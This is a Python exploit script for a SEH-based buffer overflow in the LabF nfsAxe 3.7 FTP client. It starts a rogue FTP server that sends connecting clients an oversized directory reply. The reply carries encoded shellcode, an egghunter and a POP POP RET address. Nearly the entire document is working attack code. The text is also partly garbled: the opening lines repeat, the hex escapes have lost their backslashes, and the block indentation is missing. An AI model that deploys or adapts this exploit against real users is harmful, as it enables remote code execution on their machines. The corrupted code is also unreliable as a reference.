LabF nfsAxe FTP Client 3.7 Buffer Overflow

#!/usr/bin/python

print "LabF nfsAxe 3.7 FTP Client Buffer Overflow (SEH)"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#A #!/usr/bin/python

print "LabF nfsAxe 3.7 FTP Client Buffer Overflow (SEH)"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Tested on Windows Vista x86

import socket
import sys

#badchars x00x10x0a

buf = ""
buf += "xbbx7exbcx7cx19xdaxc2xd9x74x24xf4x58x29"
buf += "xc9xb1x59x83xe8xfcx31x58x0ex03x26xb2x9e"
buf += "xecx3exf2x5ex0fxbex40x12x4bxbexa1xd5x95"
buf += "xc7xc8x6fx9cx7exb7xddx8ex69x13x07xbfxae"
buf += "x85x31xcax9dxfdxafxc8xe6x8fx7ex3fxf4xee"
buf += "xa6xddx77xa2x8ex27xb9xcexcex9bx53x78x7c"
buf += "xeex04xb5xb0x20xfexf5xf8x3cxffx5ex55xb4"
buf += "x1axe9x08xc6x8exdaxebxa2xc5x1ax87x6bxd5"
buf += "x97xe7x77x48x2cx5fx80x79x3fxedxc7x51x11"
buf += "xbfx18x79x18xfcxbex92x0bx69x49x3ax2dx83"
buf += "x23xc8x74xd0xc9xccx06x1fx37xb8xe2xb1x6b"
buf += "xbfxdfxbex64xb3x20xc1x74x92xa9xc5xfaxc6"
buf += "x41xf4xfdx60x17x1bx91x6dx43x8cx93x6cx6b"
buf += "x4cx6bx3bx4bx1bxc4x94xdcxe4xbdx5dxb4x15"
buf += "x14x7dxb3x29xa6x82x94xfaxa1x7ex1bx27x23"
buf += "xf7xfdx4dx53x51x51x6dx06x45x02xc2x56x20"
buf += "xb8xb3xfex99x3fx6exefx94x02xf7x8cx4axd6"
buf += "x75xaexb6xe6x45xa5xa3x51xb5x91x42xb6xff"
buf += "xa2x70x29x44xd5x3cx6dx79xa0xc0x49xc9x3b"
buf += "x44xb6x85xb2xc8x92x45x48x74xffx75x06x24"
buf += "xaex24xf7x85x01x8exa6x54x5dx65x49x07x5e"
buf += "xd3x79x2ex41xb6x86xcfxb3xb8x2cx03xe3xb9"
buf += "x9ax57xf4x13x0dx34x5fxcax1ax31x33xd6xbc"
buf += "xcex89x2ax36x84x14x2bx49xcex9cx81x51x85"
buf += "xf9x35x63x72x1ex07x2ax0fxd5xe3xadxe1x27"
buf += "x0bx51xccx87x5fx92xcex7cxa7x22xc1x70xa6"
buf += "x63x36x78x93x17xecx69x91x06x67xcbx7dxc8"
buf += "x9cx8axf6xc6x29xd8x53xcbxacx35xe8xf7x25"
buf += "xc8x07x1cx3bxfax17x6axd1xa3xc9x30x7ex9e"
buf += "xfexca"

egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"

egg = "w00tw00t"

nseh = "x90x90xEBx05" #JMP over SEH
seh = "xF8x54x01x68" #POP POP RET 680154F8 in WCMDPA10.DLL

buffer = "A" * 100 + egg + "x90" * 10 + buf + "D" * (9266-len(buf)) + nseh + seh + egghunter + "C" * 576

port = 21

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[i] Evil FTP server started on port: "+str(port)+" ")
except:
print("[!] Failed to bind the server to port: "+str(port)+" ")

while True:
conn, addr = s.accept()
conn.send('220 Welcome to your unfriendly FTP server ')
print(conn.recv(1024))
conn.send("331 OK ")
print(conn.recv(1024))
conn.send('230 OK ')
print(conn.recv(1024))
conn.send('220 "'+buffer+'" is current directory ')